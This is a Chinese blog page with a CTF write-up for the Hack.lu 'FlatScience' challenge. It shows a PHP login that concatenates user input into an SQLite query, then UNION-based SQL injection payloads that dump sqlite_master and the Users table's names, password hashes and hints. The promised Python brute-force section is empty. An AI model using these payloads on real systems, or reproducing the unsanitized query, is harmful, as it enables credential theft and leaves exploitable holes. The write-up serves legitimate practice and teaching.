<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="google-site-verification" content="xBT4GhYoi5qRD5tr338pgPM5OWHHIDR6mNg1a3euekI">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="对未来的最大慷慨，就是把一切都献给现在。">
    <meta name="keyword" content>
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        HackLu FlatScience WP - undefined
        
    </title>

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/aircloud.css">
    <link rel="stylesheet" href="/css/gitment.css">
    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_pl6z7sid89qkt9.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>
</head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i>  </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar ">
            <img src="/" />
        </div>
        <div class="name">
            <i>Luc1fer</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HackLu-FlatScience-WP"><span class="toc-text">HackLu FlatScience WP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-用到的东西"><span class="toc-text">0x01 用到的东西</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-robots-txt"><span class="toc-text">0x02 robots.txt</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-SQLite-数据库结构"><span class="toc-text">0x03 SQLite 数据库结构</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-代码审计"><span class="toc-text">0x04 代码审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-python爆破"><span class="toc-text">0x05 python爆破</span></a></li></ol></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i>  </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        HackLu FlatScience WP
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2017-03-23 15:13:47</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#WP" title="WP">WP</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content ">
        <p>its so hard for me to write script!</p>
<a id="more"></a>
<h1 id="HackLu-FlatScience-WP"><a href="#HackLu-FlatScience-WP" class="headerlink" title="HackLu FlatScience WP"></a>HackLu FlatScience WP</h1><hr>
<h2 id="0x01-用到的东西"><a href="#0x01-用到的东西" class="headerlink" title="0x01 用到的东西"></a>0x01 用到的东西</h2><ol>
<li>robots.txt</li>
<li>对sqlite数据库了解</li>
<li>代码审计</li>
<li>sql注入</li>
<li>python写爆破脚本</li>
</ol>
<h2 id="0x02-robots-txt"><a href="#0x02-robots-txt" class="headerlink" title="0x02 robots.txt"></a>0x02 robots.txt</h2><p>刚拿到题确实一筹莫展，没什么经验。查看robots文件之后尝试登录./login.php</p>
<p><img src="https://i.imgur.com/E9wLCCI.png" alt="robots.txt"></p>
<p><img src="https://i.imgur.com/kJafN4R.png" alt="login.php"></p>
<h2 id="0x03-SQLite-数据库结构"><a href="#0x03-SQLite-数据库结构" class="headerlink" title="0x03 SQLite 数据库结构"></a>0x03 SQLite 数据库结构</h2><ol>
<li><p>SQLite3数据库Sql_master表结构</p>
<ol>
<li><p>储存在根页中，是系统表，与mysql中的information_schema表类似，储存了该数据库中各个表的信息的建表SQL语句。</p>
</li>
<li><p>如图<img src="https://i.imgur.com/lSrD5AX.png" alt="SQLite3结构"></p>
</li>
<li><p>基础的查询语句有<br><code>select * from sqlite_master WHERE type=&quot;table&quot;;</code> 可以查询到当前数据库中所有表的详细信息。</p>
<h2 id="0x04-代码审计"><a href="#0x04-代码审计" class="headerlink" title="0x04 代码审计"></a>0x04 代码审计</h2><p>传入debug之后得到源码</p>
<p><a href="http://111.198.29.45:30157/login.php?debug" target="_blank" rel="noopener">http://111.198.29.45:30157/login.php?debug</a></p>
<?php
if(isset($_POST['usr']) && isset($_POST['pw'])){
 $user = $_POST['usr'];
 $pass = $_POST['pw'];

 $db = new SQLite3('../fancy.db');

 $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
if($res){
 $row = $res->fetchArray();
}
else{
 echo "<br>Some Error occourred!";
}

if(isset($row['id'])){
     setcookie('name',' '.$row['name'], time() + 60, '/');
     header("Location: /");
     die();
}

}

if(isset($_GET['debug']))
highlight_file('login.php');
?><p> </p>
</li>
</ol>
</li>
</ol>
<p>可以看出使用了SQLite3数据库，对post的参数没有过滤直接进行了查询。如果查询到了id就执行setcookie操作，将name字段内容加进cookie里，时间+60s。所以我们可以尝试POST参数注入。</p>
<p>  <code>usr=admin&#39; union select name,sql from sqlite_master limit 1,1--+&amp;pw=admin</code></p>
<p>这时执行的查询语句就变成了这样</p>
<p><code>SELECT id,name from Users where name=&#39;admin&#39; union select name,sql from sqlite_master limit 1,1-- and password=&#39;&quot;.sha1($pass.&quot;Salz!&quot;).&quot;&#39;</code><br>查看返回的cookie，name的value是查到的sql建表语句，id是查到的name.</p>
<p><img src="https://i.imgur.com/NnolACR.png" alt="cookie的值"><br>可以看出数据库的结构是</p>
<pre><code> CREATE TABLE Users(
id int primary key,
name varchar(255),
password varchar(255),
hint varchar(255)
)</code></pre><p>这样就知道了表名和字段名，接下来就可以得到内容</p>
<pre><code>    &apos; union select id,name from Users limit 0,1
&apos; union select id,password from Users limit 0, 1
&apos; union select id,hint from Users limit 0,1</code></pre><p>具体内容如下<br><img src="https://i.imgur.com/ynG34iE.png" alt></p>
<p>尝试CMD5破解admin的密码，没查出来，根据hint用网站的pdf里面的词爆破。（也可以看到密码进行了SHA1+salt的加密）</p>
<h2 id="0x05-python爆破"><a href="#0x05-python爆破" class="headerlink" title="0x05 python爆破"></a>0x05 python爆破</h2>
        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>

        <div id="lv-container">
        </div>

    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a href="https://hexo.io/">Hexo</a>  Theme <a href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "./public/search.xml"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>
<script src="/js/index.js"></script>
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




</html>
